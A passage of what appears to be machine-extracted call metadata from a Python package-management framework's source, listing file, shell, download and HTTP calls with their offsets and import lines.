'os.path.join', (['pp', "cfg['module_full_code_name']"], {}), "(pp, cfg['module_full_code_name'])\n", (263745, 263779), False, 'import os\n'), ((271249, 271266), 'os.path.split', 'os.path.split', (['fn'], {}), '(fn)\n', (271262, 271266), False, 'import os\n'), ((271979, 271998), 'os.path.isfile', 'os.path.isfile', (['pfn'], {}), '(pfn)\n', (271993, 271998), False, 'import os\n'), ((275353, 275390), 'os.path.join', 'os.path.join', (['p', "cfg['subdir_ck_ext']"], {}), "(p, cfg['subdir_ck_ext'])\n", (275365, 275390), False, 'import os\n'), ((275943, 275959), 'os.path.isdir', 'os.path.isdir', (['p'], {}), '(p)\n', (275956, 275959), False, 'import os\n'), ((275961, 275975), 'os.makedirs', 'os.makedirs', (['p'], {}), '(p)\n', (275972, 275975), False, 'import os\n'), ((276064, 276083), 'os.path.join', 'os.path.join', (['p', 'fn'], {}), '(p, fn)\n', (276076, 276083), False, 'import os\n'), ((276305, 276323), 'os.path.isfile', 'os.path.isfile', (['p3'], {}), '(p3)\n', (276319, 276323), False, 'import os\n'), ((276666, 276689), 'shutil.copyfile', 'shutil.copyfile', (['fn', 'p3'], {}), '(fn, p3)\n', (276681, 276689), False, 'import shutil\n'), ((277021, 277032), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (277030, 277032), False, 'import os\n'), ((277044, 277060), 'os.path.split', 'os.path.split', (['p'], {}), '(p)\n', (277057, 277060), False, 'import os\n'), ((277103, 277116), 'os.chdir', 'os.chdir', (['pp0'], {}), '(pp0)\n', (277111, 277116), False, 'import os\n'), ((277198, 277211), 'os.system', 'os.system', (['ss'], {}), '(ss)\n', (277207, 277211), False, 'import os\n'), ((277220, 277233), 'os.chdir', 'os.chdir', (['ppp'], {}), '(ppp)\n', (277228, 277233), False, 'import os\n'), ((278139, 278150), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (278148, 278150), False, 'import os\n'), ((278971, 278984), 'os.remove', 'os.remove', (['p3'], {}), '(p3)\n', (278980, 278984), False, 'import os\n'), ((17124, 17140), 'json.dumps', 'json.dumps', (['i[k]'], {}), '(i[k])\n', (17134, 17140), False, 'import json\n'), ((18162, 18181), 'sys.stderr.write', 'sys.stderr.write', (['b'], {}), '(b)\n', (18178, 18181), False, 'import sys\n'), ((22840, 22859), 'psutil.Process', 'psutil.Process', (['pid'], {}), '(pid)\n', (22854, 22859), False, 'import psutil\n'), ((24150, 24165), 'time.sleep', 'time.sleep', (['(0.1)'], {}), '(0.1)\n', (24160, 24165), False, 'import time\n'), ((25460, 25476), 'shlex.split', 'shlex.split', (['cmd'], {}), '(cmd)\n', (25471, 25476), False, 'import shlex\n'), ((27633, 27683), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['t', '"""%Y-%m-%dT%H:%M:%S"""'], {}), "(t, '%Y-%m-%dT%H:%M:%S')\n", (27659, 27683), False, 'import datetime\n'), ((27796, 27843), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['t', '"""%Y-%m-%dT%H:%M"""'], {}), "(t, '%Y-%m-%dT%H:%M')\n", (27822, 27843), False, 'import datetime\n'), ((27956, 28000), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['t', '"""%Y-%m-%dT%H"""'], {}), "(t, '%Y-%m-%dT%H')\n", (27982, 28000), False, 'import datetime\n'), ((28113, 28154), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['t', '"""%Y-%m-%d"""'], {}), "(t, '%Y-%m-%d')\n", (28139, 28154), False, 'import datetime\n'), ((28267, 28305), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['t', '"""%Y-%m"""'], {}), "(t, '%Y-%m')\n", (28293, 28305), False, 'import datetime\n'), ((28418, 28453), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['t', '"""%Y"""'], {}), "(t, '%Y')\n", (28444, 28453), False, 'import 
datetime\n'), ((37734, 37754), 'struct.calcsize', 'struct.calcsize', (['"""P"""'], {}), "('P')\n", (37749, 37754), False, 'import struct\n'), ((38409, 38423), 'os.system', 'os.system', (['cmd'], {}), '(cmd)\n', (38418, 38423), False, 'import os\n'), ((39260, 39272), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (39270, 39272), False, 'import uuid\n'), ((46135, 46162), 'base64.urlsafe_b64encode', 'base64.urlsafe_b64encode', (['s'], {}), '(s)\n', (46159, 46162), False, 'import base64\n'), ((55416, 55479), 'os.path.join', 'os.path.join', (['px', "cfg['kernel_dir']", "cfg['subdir_default_repo']"], {}), "(px, cfg['kernel_dir'], cfg['subdir_default_repo'])\n", (55428, 55479), False, 'import os\n'), ((55531, 55548), 'os.path.isdir', 'os.path.isdir', (['py'], {}), '(py)\n', (55544, 55548), False, 'import os\n'), ((55637, 55676), 'os.environ.get', 'os.environ.get', (["cfg['env_key_root']", '""""""'], {}), "(cfg['env_key_root'], '')\n", (55651, 55676), False, 'import os\n'), ((55832, 55894), 'os.path.join', 'os.path.join', (["work['env_root']", 'px', "cfg['subdir_default_repo']"], {}), "(work['env_root'], px, cfg['subdir_default_repo'])\n", (55844, 55894), False, 'import os\n'), ((55909, 55926), 'os.path.isdir', 'os.path.isdir', (['py'], {}), '(py)\n', (55922, 55926), False, 'import os\n'), ((56133, 56180), 'os.environ.get', 'os.environ.get', (["cfg['env_key_default_repo']", '""""""'], {}), "(cfg['env_key_default_repo'], '')\n", (56147, 56180), False, 'import os\n'), ((56356, 56422), 'os.path.join', 'os.path.join', (['home', '""".ck"""', '__version__', "cfg['subdir_default_repo']"], {}), "(home, '.ck', __version__, cfg['subdir_default_repo'])\n", (56368, 56422), False, 'import os\n'), ((57971, 58011), 'os.environ.get', 'os.environ.get', (["cfg['env_key_repos']", '""""""'], {}), "(cfg['env_key_repos'], '')\n", (57985, 58011), False, 'import os\n'), ((58369, 58387), 'os.path.isdir', 'os.path.isdir', (['rps'], {}), '(rps)\n', (58382, 58387), False, 'import os\n'), ((58399, 58415), 'os.makedirs', 'os.makedirs', (['rps'], {}), '(rps)\n', (58410, 58415), False, 'import os\n'), ((58538, 58583), 'os.environ.get', 'os.environ.get', (["cfg['env_key_local_repo']", '""""""'], {}), "(cfg['env_key_local_repo'], '')\n", (58552, 58583), False, 'import os\n'), ((58712, 58728), 'os.path.isdir', 'os.path.isdir', (['s'], {}), '(s)\n', (58725, 58728), False, 'import os\n'), ((58740, 58754), 'os.makedirs', 'os.makedirs', (['s'], {}), '(s)\n', (58751, 58754), False, 'import os\n'), ((60990, 61032), 'os.path.isfile', 'os.path.isfile', (["work['dir_cache_repo_uoa']"], {}), "(work['dir_cache_repo_uoa'])\n", (61004, 61032), False, 'import os\n'), ((61041, 61084), 'os.path.isfile', 'os.path.isfile', (["work['dir_cache_repo_info']"], {}), "(work['dir_cache_repo_info'])\n", (61055, 61084), False, 'import os\n'), ((64783, 64803), 'os.path.join', 'os.path.join', (['po', 'fn'], {}), '(po, fn)\n', (64795, 64803), False, 'import os\n'), ((71299, 71313), 'os.remove', 'os.remove', (['ppz'], {}), '(ppz)\n', (71308, 71313), False, 'import os\n'), ((71567, 71593), 'urllib.urlretrieve', 'urlretrieve', (['file_url', 'ppz'], {}), '(file_url, ppz)\n', (71578, 71593), False, 'from urllib import urlretrieve\n'), ((88545, 88567), 'os.path.join', 'os.path.join', (['p', 'alias'], {}), '(p, alias)\n', (88557, 88567), False, 'import os\n'), ((88788, 88808), 'os.path.join', 'os.path.join', (['p', 'sd1'], {}), '(p, sd1)\n', (88800, 88808), False, 'import os\n'), ((91228, 91246), 'os.path.isfile', 'os.path.isfile', (['p1'], {}), '(p1)\n', (91242, 
91246), False, 'import os\n'), ((91757, 91815), 'os.path.join', 'os.path.join', (['p', "cfg['subdir_ck_ext']", "cfg['file_updates']"], {}), "(p, cfg['subdir_ck_ext'], cfg['file_updates'])\n", (91769, 91815), False, 'import os\n'), ((91829, 91847), 'os.path.isfile', 'os.path.isfile', (['p3'], {}), '(p3)\n', (91843, 91847), False, 'import os\n'), ((92070, 92125), 'os.path.join', 'os.path.join', (['p', "cfg['subdir_ck_ext']", "cfg['file_desc']"], {}), "(p, cfg['subdir_ck_ext'], cfg['file_desc'])\n", (92082, 92125), False, 'import os\n'), ((92139, 92157), 'os.path.isfile', 'os.path.isfile', (['p4'], {}), '(p4)\n', (92153, 92157), False, 'import os\n'), ((93751, 93778), 'os.path.getmtime', 'os.path.getmtime', (['full_path'], {}), '(full_path)\n', (93767, 93778), False, 'import os\n'), ((96908, 96926), 'os.path.isfile', 'os.path.isfile', (['fn'], {}), '(fn)\n', (96922, 96926), False, 'import os\n'), ((111863, 111904), 'os.path.dirname', 'os.path.dirname', (["work['dir_default_repo']"], {}), "(work['dir_default_repo'])\n", (111878, 111904), False, 'import os\n'), ((111970, 111987), 'os.path.isfile', 'os.path.isfile', (['p'], {}), '(p)\n', (111984, 111987), False, 'import os\n'), ((119503, 119521), 'os.path.isdir', 'os.path.isdir', (['p00'], {}), '(p00)\n', (119516, 119521), False, 'import os\n'), ((119533, 119546), 'os.mkdir', 'os.mkdir', (['p00'], {}), '(p00)\n', (119541, 119546), False, 'import os\n'), ((119726, 119743), 'os.path.isdir', 'os.path.isdir', (['p1'], {}), '(p1)\n', (119739, 119743), False, 'import os\n'), ((121247, 121258), 'os.mkdir', 'os.mkdir', (['p'], {}), '(p)\n', (121255, 121258), False, 'import os\n'), ((122532, 122543), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (122541, 122543), False, 'import os\n'), ((122554, 122566), 'os.chdir', 'os.chdir', (['p0'], {}), '(p0)\n', (122562, 122566), False, 'import os\n'), ((122894, 122912), 'os.path.isfile', 'os.path.isfile', (['p1'], {}), '(p1)\n', (122908, 122912), False, 'import os\n'), ((123038, 123058), 'os.path.join', 'os.path.join', (['p0', 'p9'], {}), '(p0, p9)\n', (123050, 123058), False, 'import os\n'), ((123072, 123090), 'os.path.isfile', 'os.path.isfile', (['p1'], {}), '(p1)\n', (123086, 123090), False, 'import os\n'), ((124003, 124016), 'os.chdir', 'os.chdir', (['ppp'], {}), '(ppp)\n', (124011, 124016), False, 'import os\n'), ((133367, 133380), 'os.remove', 'os.remove', (['pl'], {}), '(pl)\n', (133376, 133380), False, 'import os\n'), ((135081, 135092), 'time.time', 'time.time', ([], {}), '()\n', (135090, 135092), False, 'import time\n'), ((138723, 138741), 'os.path.join', 'os.path.join', (['p', 'm'], {}), '(p, m)\n', (138735, 138741), False, 'import os\n'), ((166865, 166881), 'copy.deepcopy', 'copy.deepcopy', (['i'], {}), '(i)\n', (166878, 166881), False, 'import copy\n'), ((170021, 170083), 'subprocess.Popen', 'subprocess.Popen', (["['cmd', '/k', s]"], {'shell': '(True)', 'env': 'os.environ'}), "(['cmd', '/k', s], shell=True, env=os.environ)\n", (170037, 170083), False, 'import subprocess\n'), ((170326, 170358), 'os.system', 'os.system', (["('bash --rcfile ' + fn)"], {}), "('bash --rcfile ' + fn)\n", (170335, 170358), False, 'import os\n'), ((178872, 178889), 'os.path.isdir', 'os.path.isdir', (['p3'], {}), '(p3)\n', (178885, 178889), False, 'import os\n'), ((182086, 182099), 'os.system', 'os.system', (['ss'], {}), '(ss)\n', (182095, 182099), False, 'import os\n'), ((182295, 182308), 'os.system', 'os.system', (['ss'], {}), '(ss)\n', (182304, 182308), False, 'import os\n'), ((183526, 183539), 'os.remove', 'os.remove', 
(['pl'], {}), '(pl)\n', (183535, 183539), False, 'import os\n'), ((192168, 192184), 'os.path.split', 'os.path.split', (['p'], {}), '(p)\n', (192181, 192184), False, 'import os\n'), ((192517, 192572), 'os.path.join', 'os.path.join', (['p', "cfg['subdir_ck_ext']", "cfg['file_info']"], {}), "(p, cfg['subdir_ck_ext'], cfg['file_info'])\n", (192529, 192572), False, 'import os\n'), ((192587, 192605), 'os.path.isfile', 'os.path.isfile', (['p2'], {}), '(p2)\n', (192601, 192605), False, 'import os\n'), ((194404, 194420), 'os.path.isdir', 'os.path.isdir', (['p'], {}), '(p)\n', (194417, 194420), False, 'import os\n'), ((200021, 200045), 'os.path.join', 'os.path.join', (['pm1', 'nduoa'], {}), '(pm1, nduoa)\n', (200033, 200045), False, 'import os\n'), ((200072, 200095), 'os.path.join', 'os.path.join', (['pm', 'nduoa'], {}), '(pm, nduoa)\n', (200084, 200095), False, 'import os\n'), ((200172, 200194), 'shutil.copytree', 'shutil.copytree', (['p', 'pn'], {}), '(p, pn)\n', (200187, 200194), False, 'import shutil\n'), ((200209, 200220), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (200218, 200220), False, 'import os\n'), ((200235, 200252), 'os.path.split', 'os.path.split', (['pn'], {}), '(pn)\n', (200248, 200252), False, 'import os\n'), ((200304, 200317), 'os.chdir', 'os.chdir', (['pp0'], {}), '(pp0)\n', (200312, 200317), False, 'import os\n'), ((200404, 200417), 'os.system', 'os.system', (['ss'], {}), '(ss)\n', (200413, 200417), False, 'import os\n'), ((200432, 200448), 'os.path.split', 'os.path.split', (['p'], {}), '(p)\n', (200445, 200448), False, 'import os\n'), ((200575, 200588), 'os.system', 'os.system', (['ss'], {}), '(ss)\n', (200584, 200588), False, 'import os\n'), ((200600, 200613), 'os.chdir', 'os.chdir', (['ppp'], {}), '(ppp)\n', (200608, 200613), False, 'import os\n'), ((200628, 200644), 'os.path.isdir', 'os.path.isdir', (['p'], {}), '(p)\n', (200641, 200644), False, 'import os\n'), ((200722, 200738), 'os.rename', 'os.rename', (['p', 'pn'], {}), '(p, pn)\n', (200731, 200738), False, 'import os\n'), ((201418, 201435), 'os.path.isdir', 'os.path.isdir', (['p1'], {}), '(p1)\n', (201431, 201435), False, 'import os\n'), ((202033, 202044), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (202042, 202044), False, 'import os\n'), ((202059, 202076), 'os.path.split', 'os.path.split', (['p1'], {}), '(p1)\n', (202072, 202076), False, 'import os\n'), ((202128, 202141), 'os.chdir', 'os.chdir', (['pp0'], {}), '(pp0)\n', (202136, 202141), False, 'import os\n'), ((202228, 202241), 'os.system', 'os.system', (['ss'], {}), '(ss)\n', (202237, 202241), False, 'import os\n'), ((202253, 202266), 'os.chdir', 'os.chdir', (['ppp'], {}), '(ppp)\n', (202261, 202266), False, 'import os\n'), ((207476, 207494), 'os.path.join', 'os.path.join', (['p', 'q'], {}), '(p, q)\n', (207488, 207494), False, 'import os\n'), ((207509, 207528), 'os.path.join', 'os.path.join', (['pn', 'q'], {}), '(pn, q)\n', (207521, 207528), False, 'import os\n'), ((207572, 207592), 'os.path.dirname', 'os.path.dirname', (['pn1'], {}), '(pn1)\n', (207587, 207592), False, 'import os\n'), ((207662, 207682), 'shutil.copy', 'shutil.copy', (['p1', 'pn1'], {}), '(p1, pn1)\n', (207673, 207682), False, 'import shutil\n'), ((213186, 213204), 'os.path.isfile', 'os.path.isfile', (['p1'], {}), '(p1)\n', (213200, 213204), False, 'import os\n'), ((213213, 213230), 'os.path.isdir', 'os.path.isdir', (['p1'], {}), '(p1)\n', (213226, 213230), False, 'import os\n'), ((245836, 245854), 'os.path.isfile', 'os.path.isfile', (['p1'], {}), '(p1)\n', (245850, 245854), False, 'import os\n'), 
((252773, 252791), 'os.path.isfile', 'os.path.isfile', (['p1'], {}), '(p1)\n', (252787, 252791), False, 'import os\n'), ((252806, 252865), 'os.path.join', 'os.path.join', (['p', "cfg['subdir_ck_ext']", "cfg['file_meta_old']"], {}), "(p, cfg['subdir_ck_ext'], cfg['file_meta_old'])\n", (252818, 252865), False, 'import os\n'), ((254932, 254951), 'os.path.isfile', 'os.path.isfile', (['fn2'], {}), '(fn2)\n', (254946, 254951), False, 'import os\n'), ((255137, 255151), 'os.remove', 'os.remove', (['fn1'], {}), '(fn1)\n', (255146, 255151), False, 'import os\n'), ((255183, 255197), 'os.remove', 'os.remove', (['fn2'], {}), '(fn2)\n', (255192, 255197), False, 'import os\n'), ((255694, 255717), 'urllib2.Request', 'urllib2.Request', (['url', 's'], {}), '(url, s)\n', (255709, 255717), False, 'import urllib2\n'), ((262724, 262746), 're.match', 're.match', (['anames', 'func'], {}), '(anames, func)\n', (262732, 262746), False, 'import re\n'), ((270684, 270703), 'os.path.join', 'os.path.join', (['p', 'fn'], {}), '(p, fn)\n', (270696, 270703), False, 'import os\n'), ((270882, 270901), 'os.path.isfile', 'os.path.isfile', (['pfn'], {}), '(pfn)\n', (270896, 270901), False, 'import os\n'), ((271048, 271066), 'os.path.isfile', 'os.path.isfile', (['fn'], {}), '(fn)\n', (271062, 271066), False, 'import os\n'), ((271214, 271238), 'shutil.copyfile', 'shutil.copyfile', (['pfn', 'fn'], {}), '(pfn, fn)\n', (271229, 271238), False, 'import shutil\n'), ((272670, 272705), 'zipfile.ZipFile', 'zipfile.ZipFile', (['f', '"""w"""', 'zip_method'], {}), "(f, 'w', zip_method)\n", (272685, 272705), False, 'import zipfile\n'), ((273236, 273258), 'os.remove', 'os.remove', (['delete_file'], {}), '(delete_file)\n', (273245, 273258), False, 'import os\n'), ((275011, 275029), 'os.path.isfile', 'os.path.isfile', (['fn'], {}), '(fn)\n', (275025, 275029), False, 'import os\n'), ((275772, 275791), 'os.path.join', 'os.path.join', (['p', 'p1'], {}), '(p, p1)\n', (275784, 275791), False, 'import os\n'), ((278438, 278456), 'os.path.join', 'os.path.join', (['p', 'd'], {}), '(p, d)\n', (278450, 278456), False, 'import os\n'), ((294148, 294159), 'time.time', 'time.time', ([], {}), '()\n', (294157, 294159), False, 'import time\n'), ((16528, 16554), 'sys.stdout.buffer.write', 'sys.stdout.buffer.write', (['b'], {}), '(b)\n', (16551, 16554), False, 'import sys\n'), ((16568, 16598), 'sys.stdout.buffer.write', 'sys.stdout.buffer.write', (["b'\\n'"], {}), "(b'\\n')\n", (16591, 16598), False, 'import sys\n'), ((17983, 18009), 'sys.stderr.buffer.write', 'sys.stderr.buffer.write', (['b'], {}), '(b)\n', (18006, 18009), False, 'import sys\n'), ((18023, 18053), 'sys.stderr.buffer.write', 'sys.stderr.buffer.write', (["b'\\n'"], {}), "(b'\\n')\n", (18046, 18053), False, 'import sys\n'), ((24178, 24189), 'time.time', 'time.time', ([], {}), '()\n', (24187, 24189), False, 'import time\n'), ((54099, 54124), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (54114, 54124), False, 'import os\n'), ((54903, 54925), 'inspect.currentframe', 'inspect.currentframe', ([], {}), '()\n', (54923, 54925), False, 'import inspect\n'), ((56451, 56484), 'os.path.join', 'os.path.join', (['x', "cfg['repo_file']"], {}), "(x, cfg['repo_file'])\n", (56463, 56484), False, 'import os\n'), ((59344, 59395), 'os.environ.get', 'os.environ.get', (["cfg['env_key_local_kernel_uoa']", '""""""'], {}), "(cfg['env_key_local_kernel_uoa'], '')\n", (59358, 59395), False, 'import os\n'), ((61124, 61190), 'os.path.join', 'os.path.join', (["work['dir_default_repo']", 
"cfg['file_cache_repo_uoa']"], {}), "(work['dir_default_repo'], cfg['file_cache_repo_uoa'])\n", (61136, 61190), False, 'import os\n'), ((61290, 61357), 'os.path.join', 'os.path.join', (["work['dir_default_repo']", "cfg['file_cache_repo_info']"], {}), "(work['dir_default_repo'], cfg['file_cache_repo_info'])\n", (61302, 61357), False, 'import os\n'), ((71957, 71975), 'hashlib.md5', 'hashlib.md5', (['bpack'], {}), '(bpack)\n', (71968, 71975), False, 'import hashlib\n'), ((72406, 72435), 'os.path.join', 'os.path.join', (['new_path', 'new_d'], {}), '(new_path, new_d)\n', (72418, 72435), False, 'import os\n'), ((88511, 88531), 'os.path.join', 'os.path.join', (['p', 'sd1'], {}), '(p, sd1)\n', (88523, 88531), False, 'import os\n'), ((98316, 98350), 'urllib2.HTTPBasicAuthHandler', 'urllib2.HTTPBasicAuthHandler', (['auth'], {}), '(auth)\n', (98344, 98350), False, 'import urllib2\n'), ((98352, 98385), 'urllib2.HTTPSHandler', 'urllib2.HTTPSHandler', ([], {'context': 'ctx'}), '(context=ctx)\n', (98372, 98385), False, 'import urllib2\n'), ((119828, 119840), 'os.mkdir', 'os.mkdir', (['p1'], {}), '(p1)\n', (119836, 119840), False, 'import os\n'), ((122866, 122879), 'os.system', 'os.system', (['ss'], {}), '(ss)\n', (122875, 122879), False, 'import os\n'), ((122914, 122927), 'os.remove', 'os.remove', (['p1'], {}), '(p1)\n', (122923, 122927), False, 'import os\n'), ((126872, 126898), 'fnmatch.fnmatch', 'fnmatch.fnmatch', (['prefix', 'c'], {}), '(prefix, c)\n', (126887, 126898), False, 'import fnmatch\n'), ((133097, 133115), 'os.path.isfile', 'os.path.isfile', (['pl'], {}), '(pl)\n', (133111, 133115), False, 'import os\n'), ((135056, 135076), 'os.path.getmtime', 'os.path.getmtime', (['pl'], {}), '(pl)\n', (135072, 135076), False, 'import os\n'), ((135180, 135193), 'os.remove', 'os.remove', (['pl'], {}), '(pl)\n', (135189, 135193), False, 'import os\n'), ((174448, 174468), 're.match', 're.match', (['anames', 'ra'], {}), '(anames, ra)\n', (174456, 174468), False, 'import re\n'), ((174488, 174507), 're.match', 're.match', (['anames', 'm'], {}), '(anames, m)\n', (174496, 174507), False, 'import re\n'), ((174527, 174546), 're.match', 're.match', (['anames', 'd'], {}), '(anames, d)\n', (174535, 174546), False, 'import re\n'), ((174566, 174586), 're.match', 're.match', (['anames', 'di'], {}), '(anames, di)\n', (174574, 174586), False, 'import re\n'), ((178919, 178931), 'os.mkdir', 'os.mkdir', (['p3'], {}), '(p3)\n', (178927, 178931), False, 'import os\n'), ((193388, 193405), 'os.path.split', 'os.path.split', (['pm'], {}), '(pm)\n', (193401, 193405), False, 'import os\n'), ((194101, 194117), 'os.path.split', 'os.path.split', (['p'], {}), '(p)\n', (194114, 194117), False, 'import os\n'), ((194185, 194196), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (194194, 194196), False, 'import os\n'), ((194211, 194224), 'os.chdir', 'os.chdir', (['pp0'], {}), '(pp0)\n', (194219, 194224), False, 'import os\n'), ((194319, 194332), 'os.system', 'os.system', (['ss'], {}), '(ss)\n', (194328, 194332), False, 'import os\n'), ((194509, 194522), 'os.chdir', 'os.chdir', (['ppp'], {}), '(ppp)\n', (194517, 194522), False, 'import os\n'), ((198663, 198686), 're.match', 're.match', (['anames', 'nduoa'], {}), '(anames, nduoa)\n', (198671, 198686), False, 'import re\n'), ((198706, 198729), 're.match', 're.match', (['anames', 'nduid'], {}), '(anames, nduid)\n', (198714, 198729), False, 'import re\n'), ((199915, 199936), 'os.path.join', 'os.path.join', (['pm', 'sd1'], {}), '(pm, sd1)\n', (199927, 199936), False, 'import os\n'), ((200659, 200697), 
'shutil.rmtree', 'shutil.rmtree', (['p'], {'onerror': 'rm_read_only'}), '(p, onerror=rm_read_only)\n', (200672, 200697), False, 'import shutil\n'), ((201498, 201510), 'os.mkdir', 'os.mkdir', (['p1'], {}), '(p1)\n', (201506, 201510), False, 'import os\n'), ((206205, 206228), 're.match', 're.match', (['anames', 'nduoa'], {}), '(anames, nduoa)\n', (206213, 206228), False, 'import re\n'), ((206248, 206271), 're.match', 're.match', (['anames', 'nduid'], {}), '(anames, nduid)\n', (206256, 206271), False, 'import re\n'), ((207611, 207630), 'os.path.isdir', 'os.path.isdir', (['pn1d'], {}), '(pn1d)\n', (207624, 207630), False, 'import os\n'), ((207632, 207649), 'os.makedirs', 'os.makedirs', (['pn1d'], {}), '(pn1d)\n', (207643, 207649), False, 'import os\n'), ((243259, 243270), 'time.time', 'time.time', ([], {}), '()\n', (243268, 243270), False, 'import time\n'), ((249695, 249716), 'fnmatch.fnmatch', 'fnmatch.fnmatch', (['q', 'k'], {}), '(q, k)\n', (249710, 249716), False, 'import fnmatch\n'), ((252881, 252899), 'os.path.isfile', 'os.path.isfile', (['p1'], {}), '(p1)\n', (252895, 252899), False, 'import os\n'), ((255837, 255856), 'urllib2.urlopen', 'urllib2.urlopen', (['rq'], {}), '(rq)\n', (255852, 255856), False, 'import urllib2\n'), ((257073, 257107), 'elasticsearch.Elasticsearch', 'elasticsearch.Elasticsearch', (['[url]'], {}), '([url])\n', (257100, 257107), False, 'import elasticsearch\n'), ((271717, 271762), 'tempfile.mkstemp', 'tempfile.mkstemp', ([], {'suffix': '""".tmp"""', 'prefix': '"""ck-"""'}), "(suffix='.tmp', prefix='ck-')\n", (271733, 271762), False, 'import tempfile\n'), ((271826, 271838), 'os.close', 'os.close', (['fd'], {}), '(fd)\n', (271834, 271838), False, 'import os\n'), ((271852, 271865), 'os.remove', 'os.remove', (['fn'], {}), '(fn)\n', (271861, 271865), False, 'import os\n'), ((278614, 278633), 'os.path.dirname', 'os.path.dirname', (['pp'], {}), '(pp)\n', (278629, 278633), False, 'import os\n'), ((294574, 294585), 'time.time', 'time.time', ([], {}), '()\n', (294583, 294585), False, 'import time\n'), ((18101, 18120), 'sys.stderr.write', 'sys.stderr.write', (['s'], {}), '(s)\n', (18117, 18120), False, 'import sys\n'), ((37781, 37798), 'platform.system', 'platform.system', ([], {}), '()\n', (37796, 37798), False, 'import platform\n'), ((38013, 38047), 'os.environ.get', 'os.environ.get', (['"""ProgramW6432"""', '""""""'], {}), "('ProgramW6432', '')\n", (38027, 38047), False, 'import os\n'), ((38054, 38093), 'os.environ.get', 'os.environ.get', (['"""ProgramFiles(x86)"""', '""""""'], {}), "('ProgramFiles(x86)', '')\n", (38068, 38093), False, 'import os\n'), ((58831, 58864), 'os.path.join', 'os.path.join', (['s', "cfg['repo_file']"], {}), "(s, cfg['repo_file'])\n", (58843, 58864), False, 'import os\n'), ((64947, 64963), 'os.path.isdir', 'os.path.isdir', (['p'], {}), '(p)\n', (64960, 64963), False, 'import os\n'), ((72591, 72614), 'os.path.dirname', 'os.path.dirname', (['new_pp'], {}), '(new_pp)\n', (72606, 72614), False, 'import os\n'), ((98458, 98492), 'urllib2.HTTPBasicAuthHandler', 'urllib2.HTTPBasicAuthHandler', (['auth'], {}), '(auth)\n', (98486, 98492), False, 'import urllib2\n'), ((123915, 123933), 'os.path.isfile', 'os.path.isfile', (['p1'], {}), '(p1)\n', (123929, 123933), False, 'import os\n'), ((132655, 132666), 'time.time', 'time.time', ([], {}), '()\n', (132664, 132666), False, 'import time\n'), ((133117, 133130), 'os.remove', 'os.remove', (['pl'], {}), '(pl)\n', (133126, 133130), False, 'import os\n'), ((165564, 165583), 'os.path.join', 'os.path.join', (['p', 'ff'], 
{}), '(p, ff)\n', (165576, 165583), False, 'import os\n'), ((181623, 181643), 'os.path.join', 'os.path.join', (['p2', 'ff'], {}), '(p2, ff)\n', (181635, 181643), False, 'import os\n'), ((199957, 199975), 'os.path.isdir', 'os.path.isdir', (['pm1'], {}), '(pm1)\n', (199970, 199975), False, 'import os\n'), ((199993, 200006), 'os.mkdir', 'os.mkdir', (['pm1'], {}), '(pm1)\n', (200001, 200006), False, 'import os\n'), ((221969, 221982), 'os.listdir', 'os.listdir', (['p'], {}), '(p)\n', (221979, 221982), False, 'import os\n'), ((251522, 251544), 'fnmatch.fnmatch', 'fnmatch.fnmatch', (['v', 'ss'], {}), '(v, ss)\n', (251537, 251544), False, 'import fnmatch\n'), ((271459, 271470), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (271468, 271470), False, 'import os\n'), ((271508, 271519), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (271517, 271519), False, 'import os\n'), ((272806, 272825), 'os.path.join', 'os.path.join', (['p', 'fn'], {}), '(p, fn)\n', (272818, 272825), False, 'import os\n'), ((278543, 278561), 'os.path.exists', 'os.path.exists', (['pp'], {}), '(pp)\n', (278557, 278561), False, 'import os\n'), ((278563, 278578), 'os.makedirs', 'os.makedirs', (['pp'], {}), '(pp)\n', (278574, 278578), False, 'import os\n'), ((278655, 278674), 'os.path.exists', 'os.path.exists', (['ppd'], {}), '(ppd)\n', (278669, 278674), False, 'import os\n'), ((278676, 278692), 'os.makedirs', 'os.makedirs', (['ppd'], {}), '(ppd)\n', (278687, 278692), False, 'import os\n'), ((278740, 278758), 'os.path.isfile', 'os.path.isfile', (['pp'], {}), '(pp)\n', (278754, 278758), False, 'import os\n'), ((72500, 72522), 'os.path.exists', 'os.path.exists', (['new_pp'], {}), '(new_pp)\n', (72514, 72522), False, 'import os\n'), ((72524, 72543), 'os.makedirs', 'os.makedirs', (['new_pp'], {}), '(new_pp)\n', (72535, 72543), False, 'import os\n'), ((72640, 72663), 'os.path.exists', 'os.path.exists', (['new_ppd'], {}), '(new_ppd)\n', (72654, 72663), False, 'import os\n'), ((72665, 72685), 'os.makedirs', 'os.makedirs', (['new_ppd'], {}), '(new_ppd)\n', (72676, 72685), False, 'import os\n'), ((74246, 74265), 'os.path.normpath', 'os.path.normpath', (['p'], {}), '(p)\n', (74262, 74265), False, 'import os\n'), ((98564, 98597), 'urllib2.HTTPSHandler', 'urllib2.HTTPSHandler', ([], {'context': 'ctx'}), '(context=ctx)\n', (98584, 98597), False, 'import urllib2\n'), ((123881, 123894), 'os.system', 'os.system', (['ss'], {}), '(ss)\n', (123890, 123894), False, 'import os\n'), ((123955, 123968), 'os.remove', 'os.remove', (['p1'], {}), '(p1)\n', (123964, 123968), False, 'import os\n'), ((132630, 132650), 'os.path.getmtime', 'os.path.getmtime', (['pl'], {}), '(pl)\n', (132646, 132650), False, 'import os\n'), ((132724, 132742), 'os.path.isfile', 'os.path.isfile', (['pl'], {}), '(pl)\n', (132738, 132742), False, 'import os\n'), ((132800, 132818), 'time.sleep', 'time.sleep', (['retryd'], {}), '(retryd)\n', (132810, 132818), False, 'import time\n'), ((132841, 132859), 'os.path.isfile', 'os.path.isfile', (['pl'], {}), '(pl)\n', (132855, 132859), False, 'import os\n'), ((132966, 132984), 'os.path.isfile', 'os.path.isfile', (['pl'], {}), '(pl)\n', (132980, 132984), False, 'import 